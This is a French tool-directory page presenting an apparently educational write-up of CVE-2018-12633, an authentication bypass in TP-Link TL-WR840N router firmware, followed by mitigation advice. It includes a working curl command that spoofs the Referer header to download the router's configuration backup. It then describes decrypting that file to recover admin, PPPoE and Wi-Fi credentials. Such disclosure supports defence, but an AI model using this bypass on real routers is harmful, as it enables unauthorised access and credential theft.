Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-12633-TPLink-Auth-Bypass — Une étude de cas technique et une analyse d'exploitation de la vulnérabilité de contournement d'authentification dans le firmware TP-Link TL-WR840N (CVE-2018-12633). | Kitploit
Outils/GitHubGitHub/wiliam227user/cve-2018-12633-tplink-auth-bypass
Sécurité des Systèmes EmbarquésCassage de Mots de PasseReconnaissanceSécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebExfiltration de DonnéesSécurité Réseau

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Tests d'Intrusion
Apprentissage et Éducation
GitHubwiliam227user/cve-2018-12633-tplink-auth-bypass

CVE-2018-12633-TPLink-Auth-Bypass

Une étude de cas technique et une analyse d'exploitation de la vulnérabilité de contournement d'authentification dans le firmware TP-Link TL-WR840N (CVE-2018-12633).

Voir le dépôt
il y a 7 moisPas encore vérifié
Partager

CVE-2018-12633-TPLink-Auth-Bypass

Une étude de cas technique et une analyse d'exploitation de la vulnérabilité de contournement d'authentification dans le firmware TP-Link TL-WR840N (CVE-2018-12633).

Analyse de vulnérabilité : Contournement d'authentification TP-Link TL-WR840N (CVE-2018-12633)

License: MIT CVE: CVE-2018-12633 Category: Network Security

⚠️ Avertissement : Ce dépôt est à des fins éducatives et de recherche uniquement. L'analyse fournie ici démontre une vulnérabilité dans un firmware hérité pour souligner l'importance de la gestion du cycle de vie et de l'application des correctifs. L'exploitation non autorisée d'appareils que vous ne possédez pas est illégale.

📄 Résumé Exécutif

Cette étude de cas documente l'exploitation réussie de CVE-2018-12633, une faille logique critique dans le serveur HTTPd du routeur sans fil TP-Link TL-WR840N. La vulnérabilité permet à un attaquant non authentifié de contourner le mécanisme de connexion en manipulant l'en-tête HTTP Referer, conduisant à un accès administratif complet et à l'exfiltration de données sensibles.

🐛 Profil de Vulnérabilité

  • Appareil cible : TP-Link TL-WR840N (Firmware ~Juin 2018)
  • Vulnérabilité : Contournement d'authentification via manipulation d'en-tête
  • Score CVSS v3.x : 9.8 (Critique)
  • Vecteur : Réseau / Faible complexité / Aucun privilège requis

🛠️ Analyse Technique

La Faille

La logique du serveur web hérité valide les requêtes uniquement sur la base de l'en-tête HTTP Referer plutôt que d'un jeton de session sécurisé. Si une requête prétend provenir du mainFrame.htm interne, le serveur fait confiance à la requête comme étant authentifiée.

Méthodologie d'Exploitation

Phase 1 : Reconnaissance

L'appareil présentait un verrouillage administratif (Erreur 9003) dû à des tentatives de connexion échouées excessives. Les injections standard dans la console JavaScript (interrogation des fonctions $.act) ont échoué en raison de points de terminaison API obscurcis dans cette version du firmware.

Phase 2 : Exploitation (Manipulation d'en-tête)

En utilisant curl, nous avons conçu une requête pour contourner le verrouillage et accéder directement au chemin du fichier de configuration.

Commande d'attaque :

root@kitploit:~
curl -H "Referer: http://192.168.0.1/mainFrame.htm" \
     "http://192.168.0.1/userRpm/Romfile.cfg" \
     -o router_backup.bin

Phase 3 : Exfiltration & Déchiffrement

Résultat : Téléchargement réussi de router_backup.bin (~6 Ko). Déchiffrement : Le binaire était chiffré avec DES. En utilisant RouterPassView ou un déchiffreur DES Python personnalisé, nous avons récupéré :

  • Mot de passe administrateur en clair
  • Identifiants PPPoE
  • Configuration IP statique WAN
  • SSID et clés Wi-Fi

🛡️ Atténuation et Défense

Pour sécuriser l'infrastructure réseau contre ce vecteur spécifique :

  • Mise à jour du firmware (Critique) : Mettre à jour vers une version publiée après fin 2018.
  • Désactiver la gestion à distance : Assurez-vous que le port 8080 n'est pas exposé au WAN (définir l'IP de gestion à distance sur 0.0.0.0).
  • Rotation des identifiants : Étant donné que le fichier de configuration contient des secrets potentiellement en clair après déchiffrement, tous les mots de passe associés doivent être immédiatement changés.

🔮 Perspectives futures

Bien que CVE-2018-12633 soit une faille logique, les tendances émergentes en matière de sécurité des appareils embarqués indiquent une évolution vers des vecteurs plus complexes, notamment :

  • Injection SQL dans les serveurs Web embarqués (par exemple, CVE-2025-29649 ciblant la gestion de session SQLite).
  • Débordements de tampon dans l'analyse automatisée des paquets UPnP.

📚 Références

  • Base de données nationale des vulnérabilités NIST - CVE-2018-12633
  • Exploit-DB : Divulgation de configuration à distance TP-Link WR840N

Auteur : Ignatius Wilhelmus Kim Kerans Spécialiste en cybersécurité | Ingénieur en infrastructure réseau

Télécharger l’outil